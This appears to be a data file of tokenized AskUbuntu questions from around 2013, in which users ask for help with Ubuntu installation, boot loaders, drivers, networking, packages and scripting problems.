329059	no partitions showing during installation	i have a hp elitebook 8570w with windows7 pre-installed . when i try to install ubuntu from either a disk or a usb-stick , it skips the third step and i do n't get to see any partitions at all : the output of sudo fdisk -lu : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xb760cea1 device boot start end blocks id system /dev/sda1 * 2048 616447 307200 7 hpfs/ntfs/exfat /dev/sda2 616448 210339044 104861298+ 7 hpfs/ntfs/exfat /dev/sda3 210339840 959995903 374828032 83 linux /dev/sda4 959995904 976773119 8388608 82 linux swap / solaris disk /dev/sdb : 24.0 gb , 24015495168 bytes 255 heads , 63 sectors/track , 2919 cylinders , total 46905264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x57000000 disk /dev/sdb does n't contain a valid partition table the output of sudo parted -l : model : ata wdc wd5000bpkt-6 ( scsi ) disk /dev/sda : 500gb sector size ( logical/physical ) : 512b/4096b partition table : msdos number start end size type file system flags 1 1049kb 316mb 315mb primary ntfs boot 2 316mb 108gb 107gb primary ntfs 3 108gb 492gb 384gb primary ext4 4 492gb 500gb 8590mb primary linux-swap ( v1 ) error : /dev/sdb : unrecognised disk label warning : unable to open /dev/sr0 read-write ( read-only file system ) . /dev/sr0 has been opened read-only . error : ca n't have a partition outside the disk ! what i 've tried : sudo gdisk /dev/sda2 : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0xb760cea1 device boot start end blocks id system /dev/sda1 * 2048 616447 307200 7 hpfs/ntfs/exfat /dev/sda2 616448 210339044 104861298+ 7 hpfs/ntfs/exfat /dev/sda3 210339840 959995903 374828032 83 linux /dev/sda4 959995904 976773119 8388608 82 linux swap / solaris disk /dev/sdb : 24.0 gb , 24015495168 bytes 255 heads , 63 sectors/track , 2919 cylinders , total 46905264 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x57000000 disk /dev/sdb does n't contain a valid partition table chdisk /f in windows i 've tried this but it also did n't solve my problem . setting my sata mode from raid to ahci this did n't work out either . i had to reset it to raid to get windows7 working again installing 12.04 instead of 13.04 but the problem keeps persisting disabling my slc msata cache module windows would n't start again and the problem persisted if anyone could provide me with an answer i would be delighted . thank you in advance .
329062	dvd -playback function	can i put a dvd in my dvd-drive and check it or should i download some other programme together with ubuntu ? example : windows has mediaplayer . what does ubuntu have ?
329063	ubuntu 13.04 freezes on login	i have a serious problem with my copy of ubuntu . i had debian 7.1 , and had no idea about how to install ubuntu . i tried with tutorials off of other sites , but every time i log in ubuntu , it completely freezes , and my screen shows some sort of lines made up diagonally , leaving it unusable . i installed ubuntu 13.04 in the exact same partition as debian 7.1 ( erasing it ) with 168gb . i made the entire install correctly , no problems . but i had this problem even when i was trying ubuntu , when i booted the dvd for the 2nd time , it started correctly , but i still had the exact thing in some places , eg . : applications list . tutorial : how to install ubuntu 13.04 tutorial ( mirror ) : how to install ubuntu 13.04 specifications motherboard : amd m2n68-am se2 processor : amd sempron le-1250 2.2ghz ram : 2gb ddr2 ram hdd : 320gb hdd integrated video card : nvidia geforce 7025/nforce 630a monitor : samsung syncmaster s19b300 connection : wired
329066	vw command should run a gui but it does not !	i have installed a package , svm . i also need a gui for this package . this gui package is called vw . i think it is written in java , and since my distro is 64 bit and the vw is written for 32 bit distros , i had to install 32 bit java . before installing 32 bit java i got an error , but now after installation of 32 bit version i do not get any errors , but i also do not get any gui . what should i do ? i followed the instructions from here
329080	how to change boot order samsung np300e5c	i 've already used ubuntu , although i have installed it only via wubi . now i 'd like to try it `` for real '' , and so i went on to try to install it with a usb . i 've already created the live-usb , but i ca n't change the boot order . i have a samsung laptop ( mode np300e5c ) , and when i turn on my computer it says to press f2 to go to settings . i press the key , but there are only two options : how to initiate windows 7 ( safe mode and so on ) and start repair installation or something . do you know how can i overcome this ?
329081	i ca n't find any of my downloaded apps in the dash	i have just installed ubuntu and have problems with finding any of the apps/programs that i have downloaded form the software center . when i search for them in the dashboard they are not there . i have tried to find a solution , but have n't had any luck . can anyone help a poor âwendy windowsâ trying to understand ubuntu ? i will not give up ! ! !
329090	upgrading from ubuntu 10 to 13.04 while maintaining windows 7 dual boot	i have installed windows 7 and i have overwritten the grub with ubuntu 10 's grub . when i attempt to upgrade to ubuntu 12.04 , it presents me with two options : 1 . remove ubuntu 10 2 . upgrade from ubuntu 10 . would upgrading from ubuntu 10 to ubuntu 13.04 preserve windows 7 ?
329093	are there any mirrors for boot-repair-disk-64bit.iso ?	trying to recover from a grub error so i 'm downloading http : //sourceforge.net/projects/boot-repair-cd/ . sourceforge is absurdly slow , it 's going to take an hour at least to download 500mb . are there any better places to get this file ? how about torrents ( ca n't find it there , but maybe someone else knows a trick ) ?
329095	who is $ user with name as `` festival '' ?	have tried this script out of abs-guide ( downloaded in this galaxy somewhere ... ) : http : //paste.ubuntu.com/5952973/ it was written by mendel cooper . now on my machine an user pops up with name `` festival '' - what or who is that ?
329096	how do i get wpa2 connection to work using wl.ko proprietary driver ?	for some time i 've been using local wpe wi-fi , which was simply managed using iwconfig , using the following line of commands on the startup : sudo modprobe wl & & sudo ifconfig eth1 up & & sudo iwconfig eth1 essid < my_network_name > & & sudo dhclient eth1 however , things have changed and now i need to use wpa-2 type of connection to achieve that , i 've downloaded and installed wicd network manager , which starts to detect connections after i execute the following : sudo modprobe wl & & sudo ifconfig eth1 up the problem is , despite it works fine connecting to wpe , it completely fails to get along with wpa-2 : when i enter 'properties ' for my wpa-2 connection , i ca n't save any keys i enter , nor 'cancel ' or 'ok ' buttons seem to work anyhow at last , i 've tried to read manuals and configure /etc/network/interfaces , having the following : iface eth1 inet dhcp wpa-driver wext wpa-ssid < my_wifi_name > wpa-ap scan 1 wpa-proto rsn wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk < my_pass_hex > auto eth1 i 've commented what i had there before : auto lo iface lo inet loopback sadly , when my system loads it takes several minutes at the boot configuring the network , which ends with no success so , since nicely working wicd manager would be the best option , i 'd gladly use any possible method to get online again . i 'm running linux mint 14 nadia kernel 3.9.3
329098	switch alt-tab to ctrl-tab on 12.04	i have recently installed ubuntu 12.04 on my macbook pro , and i am trying to switch the `` switch applications '' shortcut from alt-tab to ctrl-tab . changing the shortcut via the keyboard application does not seem to have any effect , even after restarting . the application says that the `` switch applications '' shortcut is now ctrl-tab , but i can still only switch windows with alt-tab . i have previously switched my control and command keys by modifying ~/.xmodmap to the following , and suspect that there may be an unwanted interaction . remove control = control_l remove mod4 = super_l super_r keysym control_l = super_l keysym super_l = control_l keysym super_r = control_l add control = control_l control_r add mod4 = super_l super_r many thanks ; i am having a wonderful time with ubuntu so far .
329101	ubuntu 12.04 lts null pointer crash	ok , i think i 'm in a bad place ( tm ) . i 'd gotten too trusting -- the ubuntu kernel updates have been solid for a very long time . i downloaded the latest 3.2.0-51-generic-pae kernel , ran it for a week or so , then cleaned the previous kernel image out ( since my /boot was undersized ) . this server has been running reliably for -- well , a very long time . now i tried the latest apt-get update and upgrade , and the package libapt-inst1.4 failed . two files in /usr/share/locale/pl/lc_messages -- libapt-inst1.4.mo and libapt-pkg4.12.mo -- were `` strange '' permissions are all qustion marks , as are the owner/group , size , and date fields . i tried to move that directory off to lc_messages_bad and recreating it with the same permissions , but without those two files . it works . but . i ca n't reinstall libapt-inst1.4 . it fails with a kernel null pointer . now , i do n't think that 's actually a problem with the package -- i think the kernel has a problem . but , of course , i removed the previous kernel . does anyone else have an issue with the 3.2.0-15 kernel ? or the libapt-inst1.4 package ? i 'm feeling a bit vulnerable here -- it 's all working , but i ca n't apply any updates .
329109	usb flash drive - emptied but there 's no free space ( and no used space ? ! ) on it	i 'm new to ubuntu after a major windows breakdown . i 'm slowly getting used to it , but i 've just tried to copy files on to an empty usb 4gb flash drive ( well i 've actually tried two different ones ) and it says there 's no room to copy . i 've looked at the properties of the drive - 0 free space , 0 used space . where 's my storage gone ? ! i 've tried emptying the trash , unmounting , remounting etc , nothings working : ( i 'm not technical so if you know how to fix it please explain like i 'm a dummy !
329116	installing ubuntu without loss of data	i have windows 7 installed . i want to switch to ubuntu 12.04 without losing any of my data . in other words , i want to have all my files accessible from ubuntu .
329124	ca n't use radeon 8790m on latitude e6540 with kubuntu 13.04	trying to use the radeon 8790m on my dell latitude e6540 running kubuntu 13.04 ( raring ) . this laptop also has an intel adapter ( for power saving ) . lspci gives : $ lspci | grep vga 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati mars [ radeon hd 8790m ] tried using the standard fglrx and fglrx-update and aticonfig results in ( in a message box ) : aticonfig : no supported adapters detected trying amd 's drivers always renders the same result : your graphics adaper is not supported by this driver . installation will not proceed . there is no 3d acceleration , as evident by running glxgears : $ glxgears x error of failed request : badrequest ( invalid request code or no such operation ) major opcode of failed request : 153 ( glx ) minor opcode of failed request : 19 ( x_glxqueryserverstring ) serial number of failed request : 12 current serial number in output stream : 12 this may be an issue of the multi-adapter situation , but i 'm not sure how to resolve this .
329130	ubuntu phone accessibility	i am blind and currently use an iphone . one of the things i like about the iphone is its accessibility . in fact , i 'm typing this question on my iphone . i am able to do this because of voiceover , the built-in screen reader . if a blind person such as me wanted a ubuntu phone , what accessibility would be available ?
329133	how do i get to the desktop after installing ubuntu server in vmware workstation ?	i am new to this , very new ! trying to learn ! i installed the software , logged in with my username and password , but come to username @ ubuntu : ~ $ _ not sure what this is asking for or what i need to do next . please help .
329141	my shutdown buttons are not working	hey guys i just installed ubuntu and ran it for like a couple hours , but now when i try to shut down , it does n't shut down . i 've read that this is a bug and i tried to fix it with the advice i found online but nothing works . please help . i am eager to use ubuntu but i want to make sure everything is working right before i proceed .
329142	why does n't my ubuntu 13.04 connect to wifi ?	my computer was just able to connect a minute ago but after i restarted it can find wifi signals and knows the password but wo n't connect . it 's within range of the wifi signal , but simply refuses to connect . let me know of any additional info you might need . thanks for any help . my wifi just connected right after i entered these commands . can you tell whether or not my connectivity will still be unstable ? lspci | grep network gives me no output iwconfig '' yeilds wlan0 ieee 802.11bgn essid : off/any mode : managed access point : not-associated tx-power=14 dbm retry long limit:7 rts thr : off fragment thr : off power management : off lo no wireless extensions . eth0 no wireless extensions . nm-tool '' yeilds networkmanager tool state : disconnected - device : wlan0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : ath9k state : disconnected default : no hw address : 78 : dd:08 : df:9a:76 capabilities : wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points azcasa1 : infra , c8 : d7:19 : e3 : b1 : da , freq 2462 mhz , rate 54 mb/s , strength 35 wpa wpa2 airplane : infra , 00:16 : b6:0d : a1:1a , freq 2437 mhz , rate 54 mb/s , strength 19 wpa wpa2 ranger : infra , c4:3d : c7:56 : ba : a8 , freq 2462 mhz , rate 54 mb/s , strength 30 wpa guest : infra , 1c : e6 : c7:0c : df : c0 , freq 2412 mhz , rate 54 mb/s , strength 25 motorola-3f559 : infra , 20:10:7a : dc : e5:3e , freq 2462 mhz , rate 54 mb/s , strength 19 wpa2 exiga : infra , 10:9f : a9 : ac:3f:44 , freq 2412 mhz , rate 54 mb/s , strength 54 wpa wpa2 myqwest0382 : infra , 62:39:44:58:13:31 , freq 2437 mhz , rate 54 mb/s , strength 24 wpa wpa2 myqwest0381 : infra , a8:39:44:58:13:34 , freq 2437 mhz , rate 54 mb/s , strength 20 wep - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : r8169 state : unavailable default : no hw address : 54:42:49:2a : b4 : e7 capabilities : carrier detect : yes wired properties carrier : off
329143	grub rescue /deleted ubuntu partition	i accidentally deleted the ubuntu partition . all i get now is the grub rescue menu and i have a live usb from ubuntu but i can not do anything with it . i changed the boot device priority from bios but it still wo n't boot from anything . all i get is the grub rescue menu . i have read other similar posts but on most of them , booting from a live usb/ cd is suggested . however , that does n't work in my case , as described . the ls command first shows something like ( hd0 ) , ( hd0 , msdos2 ) , ( hd0 , msdos3 ) , ( hd1 ) , ( hd1 , msdos1 ) and when i try ls on each of them it says unknown file system . please help me ! best regards , ubuntu newbie
329146	authentication password	i am very new to ubuntu and i just downloaded it and its amazing but when i try to download things or create a new user it asks for an authentication password . i need help i have never made one before and i dont know what it is .
329162	unable to install bootloader	i am trying to install ubuntu 12.10 on a hp envy ultrabook 6-1113tx with windows 8 pre-installed , off of a liveusb . we tried installing ubuntu 12.04 onto his 32gb ssd by overwriting windows 8 with ubuntu buti receive this error message at the very end . failed to install grub-efi to /target/ the system will not boot . after , i ran boot-repair , followed the recommended steps but it did not help ( here is the output ) . i switched then to trying to install to ubuntu 12.10 , which recognized that 12.04 had been installed and offered the option to upgrade . however , i picked to install over 12.04 , but the same error message comes up . i also tried to format both hard drives ( 500gb hdd and a 32gb ssd on the laptop ) with gparted from the liveusb and reinstalled ubuntu 12.10 from the install ubuntu option , but the same error again . my question is : how can i install ubuntu cleanly and avoid this error ? is it worth attempting to try installing 13.04 or would we just receive a similar error ? if i were to manually create and assign the installation partitions ( swap , boot , home ) to the ssd would that work ? thanks for any help that anyone can offer .
329164	ca n't boot ubuntu or windows 8 after ubuntu 64-bit install on samsung series 7 windows 8 laptop , error `` all boot options are tried . ''	i have a samsung chronos 7 laptop ( np770z5e ) pre-installed with windows 8 , and i wanted to install ubuntu 13.04 alongside it , so i can dual boot . here is what i 've done : updated bios to lastest version ( p04abu ) using samsung updater reduced win8 partition by half , i left the others untouched created a bootable usb stick using http : //unetbootin.sourceforge.net/ and a ubuntu 13.04 64-bit image disabled faststartup on win 8 disabled fast bios mode boot mode changed to csm os update : also disabled secure boot ( i had to disable it in order to select csm os ) after that i saved the bios settings , and shut down the computer . i plugged in the usb drive , powered the computer on , entered the bios and tried to change the boot order . oddly , there was only one option in the boot order screen , the usb drive ( hdd did n't show up in the boot priority screen ) . i ignored that and installed ubuntu . i 've created 3 partitions from the unused spaced left : a 8gb swap , a 100mb bios boot partition , and the rest to ext4 , mounted in / . boot loader installed on /sda . after a reboot , this message appears : all boot options are tried . press < f4 > key to recover with factory image using recovery or any other keys for next boot loop iteration . so i went to the bios to change the boot device priority , and the list is empty ! enabling secure boot and fast bios had no effect . i used the ubuntu live usb to check the disk contents , i can see the ubuntu and win 8 partitions . i 've used boot repair ( using the recommended repair ) , with no avail , the boot repair log is here : http : //paste.ubuntu.com/5953562/ boot repair showed me a message about the system being a '' efi system '' . i suppose that means that i should have checked out the advanced settings . i do n't know how to proceed . i do n't know if it 's a good idea to `` recover with factory image '' since i have modified the original partitions . maybe i need to experiment with boot repair 's advanced settings .
329170	decrypt home folder without passphrase	i just reinstalled ubuntu after my system crashed . i installed it on another hard drive ( separate from my previous one ) . however , my old home folder from my previous system was encrypted and i do not have the passphrase to decrypt my home folder . is it still possible to recover the data ?
329174	enable/disabling ntp server	our application runs on ubuntu 12.04 precise . on this server , we have both ntpdate and ntp . how to enable and disable ntp service on-demand ? i tried 'sudo update-rc.d -f ntp remove/default ' and 'sudo update-rc.d ntp enable/disable ' commands , but when i reboot server the ntp service starts running ! i suspect ntpdate starting ntp service on reboot . i removed ntpdate package from one of my experimental server- then ntp did n't start on reboot after issuing command 'update-rc.d ntp disable ' . is there a way to control this ? or is there way to permanently disable ntpdate ? thanks .
329176	how to open network pc there folders in net beans by open project option	i have ubuntu 13.04 , installed netbeans 7.3.1 php , for php development , all file are save in network pc , i can bookmark and open network pc file and folder easy , but when i 'm using netbeans and when i try to open network pc or bookmark which i saved earlier there no option coming only showing own pc folder like home , opt , var , usr , but no network or bookmark option .
329183	dual boot of ubuntu and win7	i 'm intrested in installing ubuntu 12.04 parallel to windows 7 ( basic ) . i read all the posts in the forum about it , installing ubuntu alongside . i am allocating 100 gb hard drive space for ubuntu . will the swap be created automatically ? or do i need to create it manually . and about grub : whether ubuntu will take control of booting , or else i need to install third party software ... ?
329184	several online media players do n't work in firefox but they do in chrome	i have noticed that i have not been able to play audio or video from a few different players in firefox for a while , namely videos from the canal + zapping website and music from the free music archive website ; however , most other websites , like youtube , dailymotion and soundcloud , work perfectly in firefox . also , this problem does not exist in google chrome . i am using ubuntu 13.04 and firefox 22.0 with proposed and backport updates , as well as ubuntu-restricted-extras 57 installed . cheers
329185	ubuntu 12.04 not getting shutdown	im using ubuntu 12.04 and every time i try to shutdown or reboot from gui , it just logs out and just be there in the login screen . it only shuts down after i login and open a terminal , become a root user and then do init 0 .it shuts down when i use init 0 else not . if any one has faced this issue please share the solution .
329186	ubuntu on toshiba u920t/023 ?	all thinking of getting toshiba satellite u920t/023 . this is a tablet with sliding keyboard and is bundled with horrible windows 8 . did anyone try to install ubuntu on it and get it to work as tablet and as a laptop ? thanks , rudolf
329189	video down loader just like free make video downloader	when i was using windows 7 there is an application called `` free make video downloader '' .we can download any video through this . i would like to know is there any video downloader like this . when i search through internet i found many application to download youtube video and all . but it is not supporting to other sites like videos in facebook and all guys pls help me to find a solution for this
329193	acid rip : dvd not found /dev/dvd	i inserted a dvd , and nautilus shows its audio_ts and video_ts folders correctly . it is making a bit of noise ( like seeking/giving up frequently ) but i guess it is not the problem . problem : acid rip says dvd not found , and pressing load for /dev/dvd does not do anything . my /dev/dvd is a symlink to /dev/sr0 .
329198	bootstrapping juju 1.13 to private openstack	i 've been trying for ages now to get juju to bootstrap with my private openstack installation . starting with 1.11 i 've been stuck with this error during bootstrap : error : can not start bootstrap instance : no `` precise '' images in regionone with arches [ amd64 i386 ] in 1.11 i was able to use 'juju image-metadata ' to create the index.json and imagemetadata.json files for upload to swift ( though i still never got past the error ) , but this command no longer exists in 1.13 , and i ca n't find any mention of a replacement . is there a way to bootstrap a private openstack cloud with juju 1.13 ? and if so , is there any documentation to guide me through from scratch ? i 'm eager to learn how to develop juju services , but i ca n't even get it bootstrapped ! ** edit : the primary issue is that the 'juju image-metadata ' is missing , so i 'm not able to follow the instructions in the linked question . is there a replacement to 'juju image-metadata ' ? * i have tried both commands , both report as missing . thanks for your help so far !
329199	ubuntu on lg 705	can i install ubuntu on lg p705 optimus smart phone . i would like to install ubuntu in my phone . please advise if it is possible . currently i have android 4.04
329201	how to install and run oracle solaris studio 12.3 on ubuntu 13.04 ?	how to install and run oracle solaris studio 12.3 on ubuntu 13.04 ? i followed the answer in installing solaris studio 12.2 in ubuntu but i 'm not understanding how to launch the ide .
329202	how to send snmp trap which will have all the information about commands fired by each user ?	so can anyone help me to configure below 3 points on client side where we have snmp service installed ? litle bit of background : we have one opennms monitoring server , which monitors all other servers in our organization . since last few days we have a requirement to monitor below points on all ubuntu servers . ( as all linux servers are ubuntu in our organization . ) 1 . history of all the commands used or tried ( history of every users cli ) by any user with basic information . ( like username , complete command , date and time command was used , whether it was successful or not , etc . ) 2 . list of users who have not logged in to the server since last 10 days . 3. list of users who 's passwords are locked out or auth keys are expired . now opennms monitors all servers using snmp & snmp traps . please feel free to ask in case any further information is required . thanks in advance . some additional information about opennms server we have : opennms web console version : 1.10.10 server time : tue aug 06 13:14:21 ist 2013 client time : tue aug 06 2013 13:12:57 gmt+0530 ( india standard time ) java version : 1.6.0_27 sun microsystems inc. java virtual machine : 20.0-b12 sun microsystems inc. operating system : linux 3.5.0-23-generic ( amd64 ) servlet container : jetty/7.5.1.v20110908 ( servlet spec 2.5 ) user agent : mozilla/5.0 ( windows nt 6.1 ) applewebkit/537.36 ( khtml , like gecko ) chrome/28.0.1500.95 safari/537.36 database type : postgresql database version : 9.1.9
329204	how to make an ntfs partition on hdd ( 12.10 )	i currently own a netbook running ubuntu 12.10 and i want to install windows xp on it . i have the installation file on my pendrive as my netbook doesnt have disk drive . but when i opened the setup.exe , it didnt open . so i installed wine on my netbook , i opened the file and setup opens , but when i try to install it it says- '' no valid system partitions were found , setup is unable to continue '' then i decided to make that pendrive a bootable one , , so i could install xp , so i downloaded rufus , it didnt run on my system idk why . so i did some research and found a video which showed to make my pendrive ntfs , and then use unetbootin to make it bootable . si i downloaded the 7zip application and then selected the xp iso for unetbootin ... i waited for like 10 mins for the process to finish . then i rebooted and booted from the pendrive , but it had a small blue screen saying unetbootin ( something like that ) and a timer below counting down from 10 for something ( for automatic boot afai remember ) , and it said press tab to edit options.and after counting to 10 the whole process starts again : ( please help me install xp on my netbook . can anyone tell me the solution or an easy way to install xp ? ? i think that making an ntfs partition on my existing 120 gb hdd will work but im afraid that it will delete ubuntu . i only have this pc at the moment help ! p.s . please keep in mind that im a total noob
329210	php5.4 unable to load dynamic library gd.so undefined symbol : gdgetc	i installed php5.4 from ppa ppa : ondrej/php5-oldstable in my ubuntu 12.04.2 . then all of my image processing scripts got broken . turns out the php5-gd library is n't loaded . $ php -a php warning : php startup : unable to load dynamic library '/usr/lib/php5/20100525/gd.so ' - /usr/lib/php5/20100525/gd.so : undefined symbol : gdgetc in unknown on line 0 interactive mode enabled here 's some package installed in my machine related to gd ( hope might help , let me know if you need to know details of other packages ) : ii libgd2-xpm 2.0.36~rc1~dfsg-6ubuntu2 gd graphics library version 2 ii libgd2-xpm : i386 2.0.36~rc1~dfsg-6ubuntu2 gd graphics library version 2 ii libgd3 2.1.0-2~precise+1 gd graphics library ii php5-gd 5.4.17-4+debphp.org~precise+1 gd module for php5 is there any way to fix this ?
329211	impossible to write `` ê '' or `` ï ''	i have a french keyboard ( lxkeymap : france - > french ) and i am not able to write the french letters `` ê '' or `` ï '' ( the other french letters / accents work ) . when i press the key it just does nothing . one strange thing is that the signs alone appears in skype ( `` ˆ '' or `` ¨ '' ) . in lxkeymap , if i switch to `` french ( eliminate dead keys ) '' , i can write `` ˆ '' or `` ¨ '' in any application . so the key seems to work , but not combined with letters . does anyone has the same problem ? thank you , romain edit : as requsted : rom @ rom-satellite-l300 : ~ $ locale lang=en_gb.utf-8 language=en_gb : en lc_ctype= '' en_gb.utf-8 '' lc_numeric=en_us.utf-8 lc_time=en_us.utf-8 lc_collate= '' en_gb.utf-8 '' lc_monetary=en_us.utf-8 lc_messages= '' en_gb.utf-8 '' lc_paper=en_us.utf-8 lc_name=en_us.utf-8 lc_address=en_us.utf-8 lc_telephone=en_us.utf-8 lc_measurement=en_us.utf-8 lc_identification=en_us.utf-8 lc_all=
329212	unable to get ping output to text file	below is my script to store the ping result on a text file , but the result stored in the output file is not complete , it is missing the last statement where ping stats are shown . can anyone help in this ? script : # ! /bin/bash cp /dev/null /etc/scripts/ping-results.txt fping -c5 -t50 192.168.10.1 > > /etc/scripts/ping-results.txt # fping -c10 -t50 202.141.253.139 | perl -nle 'print scalar ( localtime ) , `` `` , $ _ ' > > /etc/scripts/ping-results.txt output when script is run : root @ noc-tst : /etc/scripts # ./ping-test.sh 192.168.176.54 : xmt/rcv/ % loss = 5/5/0 % , min/avg/max = 19.2/19.5/20.4 output file ( ping-results.txt ) : - tue aug 6 00:12:10 2013 192.168.176.54 : [ 0 ] , 84 bytes , 19.2 ms ( 19.2 avg , 0 % loss ) tue aug 6 00:12:11 2013 192.168.176.54 : [ 1 ] , 84 bytes , 19.3 ms ( 19.2 avg , 0 % loss ) tue aug 6 00:12:13 2013 192.168.176.54 : [ 2 ] , 84 bytes , 19.5 ms ( 19.3 avg , 0 % loss ) tue aug 6 00:12:14 2013 192.168.176.54 : [ 3 ] , 84 bytes , 19.3 ms ( 19.3 avg , 0 % loss ) tue aug 6 00:12:15 2013 192.168.176.54 : [ 4 ] , 84 bytes , 19.5 ms ( 19.4 avg , 0 % loss )
329217	could n't install packages	i have installed ubuntu 12.04 on windows 7 . i have tried to install vim editor through terminal using sudo apt-get install vim then i got the following error and could n't install the package . not only this i could n't install anything from terminal or ubuntu center . i am sure that my internet connection is good and i could browse the internet . this is the error i got : - reading package lists ... done building dependency tree reading state information ... done some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : vim : depends : vim-common ( = 2:7.3.429-2ubuntu2 ) but 2:7.3.429-2ubuntu2.1 is to be installed e : unable to correct problems , you have held broken packages .
329218	how to reboot ubuntu server machine from outside	i am at the office right now and my ubuntu server is at home . i was connected to my server few minutes ago when i got this message : '' ssh : connect to host port 22 : no route to host '' maybe this is a silly question but i was wondering if there is a way how to reboot that server while not beign phisically there ? i am almost 100 % sure that a reboot will fix the problem and will restore that machine . i can ping my other laptop so the network at home is working fine . thank you !
329223	background settings for tiling and stretching seems to be missing in 13.04	i 'm running ubuntu with a custom gnome-session which replaces the default window manager with xmonad . i.e. , when i log in , i select `` xsession '' in lightdm , and i have an .xsession file in my home directory which executes gnome-session -- session=xmonad , where /usr/gnome-session/sessions/xmonad.session contains a modified gnome session which selects xmonad as the window manager . after upgrading to ubuntu 13.04 , the settings for specifying whether my desktop background/wallpaper should stretch or tile seems to have been removed ! there is now just a single , large button for changing the wallpaper , but nothing else .
329230	exclude from * in command line	there are plenty of situations where the use of a * is virtually inevitable - e.g . rm -rf * in a folder that holds thousands of subfolders and files . but what if you want to exclude just one or two files or folders from the rm command ? i 've googled my way around and only found quite complicated solutions like find . -depth -not \ ( -name 'one ' -o -name 'two ' \ -o -name 'three ' \ ) -exec rm { } \ ; as stated here . is there a possibility to do this in an easier way - without that detour to find ? e.g . rm -rf -- exclude='one ' -- exclude='two ' -- exclude='three ' * like in rsync or just rm -rf -e 'one ' , 'two ' , 'three ' * ? maybe even a general possibility to exclude things from * ( so other commands like cp , mv , ... do n't have to implement their own ) ? something like * { 'one ' , 'two ' , 'three ' } or so ?
329231	how to add dns suffix in ubuntu 12.04 ?	i have just installed ubuntu 12.04 . and i am a beginner on linux . so , how can i add the dns suffix in this os . please help..
329232	how can i add a script launcher to the top bar ?	i have a ruby script , which starts a server and opens a browser . it runs without any problems when called from terminal , but when i try to add a launcher to the top bar of the classic gnome desktop , with the properties set as in the picture below , and click on it , the program does not run . how can i add a launcher to the tap bar ?
329234	printing on yocto minidisplay on system startup	i have developed a c application and i am also using a yocto_minidisplay , which prints some messages from the application . i need to start the application on system start up , so that on the display it shows `` welcome '' . i am unable to start the application automatically on system startup . i am also using a virtualhub application for yoctopuce devices . please help me its really urgent . i am using ubuntu 12.04. i dont want any other applications just i need to run only my application on startup .the problem i am facing is the lcd devices are not getting initailized . currently i have connected display with usb . how to add time out in starting an application in ubuntu . which is the best way to add our application to system start up
329243	writing a script , making it executable then assigning it keys	i have a samsung np700z5a and have managed to get most features working but would love to get the keyboard backlight keys working . i have tried several methods including through the terminal . i have discovered that this works through the terminal : echo 6 > /sys/class/leds/samsung\ : \ : kbd_backlight/brightness after an sudo su ( but not , sudo echo 6 > /sys/class/leds/samsung\ : \ : kbd_backlight/brightness where i get permissions denied ) . i have tried running this in autokey as this script : # ! /bin/bash sudo su echo 3 > /sys/class/leds/samsung\ : \ : kbd_backlight/brightness and assigned it to some keys in autokey but it did not work . i noticed that when i tried to assign it to the fn + f9 key , this key and fn + f10 where not recognised at all ( these are the keys designated to turn the keyboard backlight up and down in a windows install ) so i assigned it to super + - instead . as i said it does not work . please help .
329249	i want to create .dmg file from my source file on ubuntu so that i can distribute it on mac ?	is there a way to create .dmg file from my source file , from command line , or is there any software available which will allow me to roll out my software on mac os as well ? thanks in advance .
329250	problems in installing ubuntu through wubi.exe file	i am using windows 7 32-bit os . i want to dual-boot ubuntu alongside it . i downloaded wubi.exe file but when i try to run it after asking for username and password details , i get an error message which says , an error occured : could not retrieve the required disk image files for more information , please see the log file c : \users\dell\appdata\local\temp\wubi-12.04-rev272.log i do n't understand the text in the log file .
329253	upstart and node js : can not find module	i 'm trying to setup upstart to run with my node js and socket.io server . /etc/init/quizens.conf env node_bin=/usr/bin/node env app_dir=/root/quizens env script_file= '' quizens.js '' env log_file=/root/quizens.log env run_as= '' root '' start on filesystem stop on shutdown respawn respawn limit 1 10 script touch $ log_file chown $ run_as : $ run_as $ log_file chdir $ app_dir exec sudo -u $ run_as sh -c `` $ node_bin $ script_file > > $ log_file 2 > & 1 '' end script when i run start quizens in the log file i get can not find module fb ... . altough if i simply start the server from command line it works . the modules are installed with -g and they reside in /usr/lib/node_modules i ca n't find a problem while on my local machine it works like a charm , but not when putting it on a softlayer instance . the difference is that the local machine node is installed in /usr/local/bin/node not in /usr/bin/node . is this the problem ? edit : yesterday i added another ip for the instance . i do n't know if this has anything to do with upstart ...
329254	problem installing setup files for windows	i have downloaded and used wine for installing the windows setup file . are there any other ways to run setup files of windows . any advice or suggestions would be appreciated
329257	after changing password , can not log in	i lost the password to my old laptop , and after reading , i found out how to change it using the text interface . i successfully changed my password to my root user , but now instead of telling me `` incorrect password '' it just blinks the screen black and returns me to the login prompt with no message . i know the password is correct . i 've seen many other questions with this problem , but nobody 's solutions have helped so far . i 've used the text interface to upgrade to the latest version . i 've tried removing xauthority , ( it was not found ) . i can login to the root account just fine through the non-graphic interface of course , but i just ca n't seem to figure out what 's wrong with the graphic login . i am a complete rookie when it comes to linux/ubuntu , so keep that in mind . thanks in advance for any advice you can offer .
